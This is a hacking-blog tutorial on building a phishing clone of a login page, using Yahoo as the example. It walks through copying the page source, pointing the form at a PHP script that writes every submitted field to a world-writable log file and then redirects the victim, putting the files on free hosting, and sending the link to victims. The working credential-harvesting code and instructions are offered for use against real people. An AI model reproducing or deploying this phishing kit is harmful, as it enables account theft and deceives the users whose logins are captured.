devil

How to Make a Phisher/Fake Page For Any Website


How to Make a Phisher/Fake Page For Any Website 





 







1. First open the website in a browser for which you want to create a phishing page . Now right click  in an empty space and select view source , copy all the contents to a note pad and save it as something.html 
example :
              yahoo.html

2. Now open Yahoo.html (something.html) in a notepad .Now search for the string 




"action = https.." and change the address to login.php and save it



3. Now we have to create login.php .For this open notepad , copy/paste the following code in it and save it as login.php







header ('Location: http://yahoo.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>





Note :- By default the victim will be redirected to yahoo.com once he clicks login ,If you want you can change the address you can do it  by changing the www.yahoo.com to any  address you desire












4. Now we have to create a empty log file for this Open a notepad and save the empty file as log.txt. 

5. Now create an account in Free web hosting sites, which supports php like , T35.com or 000webhost.com 

6. Now upload all the three files which we created Yahoo.html , login.php ,log.txt  and change the file permissions for log.txt to 777 

7. Now send the  Yahoo.html link to the victim , once  he enters the information and logins in , every thing will be stored in log.txt  ,you can open log.txt to see all the login details 

******************************************
Liked the post? Like us on Facebook or follow us on Twitter




SUBSCRIBE FOR HOTTEST HACKING TRICKS:

Delivered by FeedBurner
TECH-HOLICS BLOG MAGAZINE



ADVERTISEMENT
Subscribe to this Blog via Email :

Would love to here from you...